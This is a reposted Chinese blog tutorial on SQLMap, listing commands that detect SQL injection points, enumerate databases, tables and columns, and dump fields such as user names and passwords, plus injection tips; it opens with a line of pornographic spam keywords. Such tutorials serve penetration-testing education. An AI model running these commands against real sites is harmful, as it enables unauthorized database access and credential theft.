国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

這篇具有很好參考價(jià)值的文章主要介紹了【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

SQLMap介紹

SQLMap是一個(gè)自動化的SQL注入工具,主要功能是掃描、發(fā)現(xiàn),并利用給定url(域名)的SQL注入漏洞。SQLMap支持的數(shù)據(jù)庫有MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。

相對于手工注入,sqlmap的高效注入大大提高了我們滲透效率。Sqlmap采用了以下5種獨(dú)特的SQL注入技術(shù):

  • 聯(lián)合查詢,在可以使用Union的情況下注入(注入效率最高,成本最低)

  • 報(bào)錯(cuò)注入,即頁面會返回錯(cuò)誤信息,或者把注入的語句的結(jié)果直接返回到頁面中

  • 布爾盲注,即可以根據(jù)返回頁面判斷條件真假的注入

  • 延時(shí)注入,即不能根據(jù)頁面返回的內(nèi)容判斷任何信息,要用條件語句查看時(shí)間延遲語句是否已經(jīng)執(zhí)行(即頁面返回時(shí)間是否增加)來判斷

  • 堆疊查詢,可以同時(shí)執(zhí)行多條語句時(shí)的注入

SQLMap 的強(qiáng)大的功能包括數(shù)據(jù)庫指紋識別、數(shù)據(jù)庫枚舉、數(shù)據(jù)提取、訪問目標(biāo)文件系統(tǒng),并在獲取完全的操作權(quán)限時(shí)實(shí)行任意命令;當(dāng)常規(guī)的注入工具不能利用SQL注入漏洞進(jìn)行注入時(shí),使用SQLMap會起到很不錯(cuò)的效果

SQLMap的簡單使用方法

常用命令及參數(shù)

當(dāng)發(fā)現(xiàn)sql注入的時(shí)候,根據(jù)我們注入的不同,對SQLMap使用的參數(shù)也不同

sqlmap -u 'URL'                          檢測注入點(diǎn)
sqlmap -u 'URL' --dbs                    列出所有數(shù)據(jù)庫的名字
sqlmap -u  URL --is-dba                  當(dāng)前用戶是否是數(shù)據(jù)庫管理員
sqlmap -u  URL --current-db              列出當(dāng)前數(shù)據(jù)庫的名字

-D                                       指定一個(gè)數(shù)據(jù)庫
--tables                                 列出所有表名
sqlmap -u URL -D "xx" --tables          列出xx數(shù)據(jù)庫中的所有表

-T                                       指定一個(gè)表
--columns                                列出所有的字段名
sqlmap -u URL -D "xx" -T "cc" --columns 列出表中所有的字段名

-C                                        指定一個(gè)字段名
--dump                                    列出字段內(nèi)容
sqlmap -u URL -D "xx" -T "cc" -C "x,x,.." --dump  列出字段內(nèi)容(-T ,-C之類的要用大寫不然有時(shí)候會讀不出來)。未指定字段-dump則全部列出

-v3

如果你想觀察sqlmap對一個(gè)點(diǎn)是進(jìn)行了怎樣的嘗試判斷以及讀取數(shù)據(jù)的,可以使用-v參數(shù)。

共有七個(gè)等級,默認(rèn)為1:

  • 0 只顯示python錯(cuò)誤以及嚴(yán)重的信息。

  • 1 同時(shí)顯示基本信息和警告信息(默認(rèn))

  • 2 同時(shí)顯示debug信息

  • 3 同時(shí)顯示注入的payload

  • 4 同時(shí)顯示HTTP請求

  • 5 同時(shí)顯示HTTP響應(yīng)頭

  • 6 同時(shí)顯示HTTP響應(yīng)頁面

如果你想看到sqlmap發(fā)送的測試payload最好的等級就是-v 3。

SQLMap詳細(xì)使用方法

查看幫助手冊

sqlmap.py -h
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

可以看到SQLMap中顯示的一些參數(shù)

檢測注入點(diǎn)及注入類型

sqlmap.py -u 'url'
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

列出所有數(shù)據(jù)庫的名字

sqlmap.py -u 'URL' --dbs
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

列出當(dāng)前數(shù)據(jù)庫的名字

sqlmap.py -u URL --current-db
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

列出指定數(shù)據(jù)庫的所有表

sqlmap.py -u 'url' -D "security" --tables
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

列出指定表的所有字段

sqlmap.py -u 'url' -D "security" -T "users" --columns
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

列出某字段中的所有字段內(nèi)容

sqlmap.py -u 'url' -D "security" -T "users" -C "name,password" --dump
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法
【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法

總結(jié):

  1. sqlmap只是用來檢測和利用sql注入點(diǎn),并不能掃描出網(wǎng)站有哪些漏洞,使用前請先使用掃描工具掃出sql注入點(diǎn)。

  1. 注入小技巧:

有回顯可以用聯(lián)合查詢,有報(bào)錯(cuò)可以用報(bào)錯(cuò)注入;

都沒有再看有沒有布爾類型的狀態(tài)(顯示或者不顯示);

若以上都沒有,試試用延時(shí)注入;

或者我們直接測試延時(shí)注入。文章來源地址http://www.zghlxwxcb.cn/news/detail-498655.html

到了這里,關(guān)于【SQLMap工具】SQLMap基礎(chǔ)及簡單使用方法的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 工具推薦-Colab介紹與使用方法

    工具推薦-Colab介紹與使用方法

    之所以能夠接觸到Colab,是由一位好朋友的推薦,首先得先感謝他安利了這么好的一個(gè)東西,哈哈哈!我先淺聊一下我目前對這個(gè)Colab的理解吧,我認(rèn)為它就相當(dāng)于一臺云主機(jī),由Google 云端硬盤作為存儲地,所以首先得要有Google 云端硬盤,它可以在Google硬盤上面搭建起來,然

    2024年02月04日
    瀏覽(22)
  • 【Java中的Thread線程的簡單方法介紹和使用詳細(xì)分析】

    【Java中的Thread線程的簡單方法介紹和使用詳細(xì)分析】

    提示:若對Thread沒有基本的了解,可以先閱讀以下文章,同時(shí)部分的方法已經(jīng)在如下兩篇文章中介紹過了,本文不再重復(fù)介紹??! 【Java中Tread和Runnable創(chuàng)建新的線程的使用方法】 【Java中的Thread線程的七種屬性的使用和分析】 提示:以下是本篇文章正文內(nèi)容,下面案例可供參

    2024年02月15日
    瀏覽(22)
  • 自動化測試工具 —— selenium介紹及基本使用方法

    自動化測試工具 —— selenium介紹及基本使用方法

    Selenium是一個(gè)開源、免費(fèi)、簡單、靈活,對Web瀏覽器支持良好的自動化測試工具,在UI自動化、爬蟲等場景下是十分實(shí)用的,能夠熟練掌握并使用Selenium工具可以大大的提高效率。 Selenium簡介 Selenium支持多平臺、多瀏覽器、多語言去實(shí)現(xiàn)自動化測試,是一個(gè)開源和可移植的Web測

    2024年02月05日
    瀏覽(92)
  • 【十年網(wǎng)絡(luò)安全工程師整理】—100滲透測試工具使用方法介紹

    ?滲透測試是指滲透人員在不同的位置(比如從內(nèi)網(wǎng)、從外網(wǎng)等位置)利用各種手段對 某個(gè)特定網(wǎng)絡(luò)進(jìn)行測試,以期發(fā)現(xiàn)和挖掘系統(tǒng)中存在的漏洞,然后輸出滲透測試報(bào)告, 并提交給網(wǎng)絡(luò)所有者。網(wǎng)絡(luò)所有者根據(jù)滲透人員提供的滲透測試報(bào)告, 可以清晰知曉系統(tǒng)中存在的安

    2024年02月02日
    瀏覽(29)
  • 【APP滲透測試】Android APK常用測試工具(Drozer)安裝及使用方法介紹

    【APP滲透測試】Android APK常用測試工具(Drozer)安裝及使用方法介紹

    本篇文章主要介紹 Drozer Android測試工具的安裝以及簡單使用,后續(xù)會持續(xù)更新更多使用方法。 Drozer 是 MWR Labs 開發(fā)的一款A(yù)ndroid安全測試框架。是目前最好的Android安全測試工具之一。其官方文檔說道: Drozer允許你一個(gè)普通Android應(yīng)用的身份與其他應(yīng)用和操作系統(tǒng)交互。 在Web世界

    2024年02月16日
    瀏覽(30)
  • 快速、準(zhǔn)確地檢測和分類病毒序列分析工具 ViralCC的介紹和詳細(xì)使用方法, 附帶應(yīng)用腳本

    快速、準(zhǔn)確地檢測和分類病毒序列分析工具 ViralCC的介紹和詳細(xì)使用方法, 附帶應(yīng)用腳本

    viralcc是一個(gè)基因組病毒分析工具,可以用于快速、準(zhǔn)確地檢測和分類病毒序列。 github:dyxstat/ViralCC: ViralCC: leveraging metagenomic proximity-ligation to retrieve complete viral genomes (github.com) ?Instruction of reproducing results in ViralCC paper:dyxstat/Reproduce_ViralCC: Instruction of reproducing results in ViralCC

    2024年01月24日
    瀏覽(35)
  • 自動化測試工具Selenium的基本使用方法,軟件測試基礎(chǔ)

    自動化測試工具Selenium的基本使用方法,軟件測試基礎(chǔ)

    browser.find_element(By.ID,‘kw’).send_keys(“美女”) browser.find_element_by_id(‘kw’).send_keys(‘性感’) 2.通過標(biāo)簽name屬性進(jìn)行定位 browser.find_element_by_name(“wd”).send_keys(“Linux”) browser.find_element(By.NAME,‘wd’).send_keys(“美女”) 3.通過標(biāo)簽名進(jìn)行定位 browser.find_element_by_tag_name(“input”).

    2024年04月22日
    瀏覽(97)
  • AI之Merlin:Merlin(一款使用ChatGPT和GPT-4的簡單且免費(fèi)的工具)的簡介、安裝、使用方法之詳細(xì)攻略

    AI之Merlin:Merlin(一款使用ChatGPT和GPT-4的簡單且免費(fèi)的工具)的簡介、安裝、使用方法之詳細(xì)攻略 目錄 Merlin的簡介(一款使用ChatGPT和GPT-4的簡單且免費(fèi)的工具) Merlin的安裝 第一步,先添加插件

    2024年02月13日
    瀏覽(23)
  • Stable Diffusion——基礎(chǔ)模型、VAE、LORA、Embedding各個(gè)模型的介紹與使用方法

    Stable Diffusion——基礎(chǔ)模型、VAE、LORA、Embedding各個(gè)模型的介紹與使用方法

    Stable Diffusion(穩(wěn)定擴(kuò)散)是一種生成模型,基于擴(kuò)散過程來生成高質(zhì)量的圖像。它通過一個(gè)漸進(jìn)過程,從一個(gè)簡單的噪聲開始,逐步轉(zhuǎn)變成目標(biāo)圖像,生成高保真度的圖像。這個(gè)模型的基礎(chǔ)版本是基于擴(kuò)散過程的,但也有一些改進(jìn)版本,包括基于變分自動編碼器(VAE)、局部

    2024年02月22日
    瀏覽(23)
  • AI:DeepSpeed Chat(一款幫用戶訓(xùn)練自己模型的工具且簡單/低成本/快 RLHF 訓(xùn)練類ChatGPT高質(zhì)量大模型)的簡介、安裝、使用方法之詳細(xì)攻略

    AI:DeepSpeed Chat(一款幫用戶訓(xùn)練自己模型的工具且簡單/低成本/快 RLHF 訓(xùn)練類ChatGPT高質(zhì)量大模型)的簡介、安裝、使用方法之詳細(xì)攻略

    AI:DeepSpeed Chat(一款幫用戶訓(xùn)練自己模型的工具且簡單/低成本/快 RLHF 訓(xùn)練類ChatGPT高質(zhì)量大模型)的簡介、安裝、使用方法之詳細(xì)攻略 目錄 DeepSpeed Chat的簡介 DeepSpeed-Chat的產(chǎn)生背景 DeepSpeed-Chat的簡介 DeepSpeed-Chat的三大功能 DeepSpeed-RLHF 系統(tǒng)三大優(yōu)勢 DeepSpeed Chat的安裝和使用方法

    2023年04月22日
    瀏覽(37)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包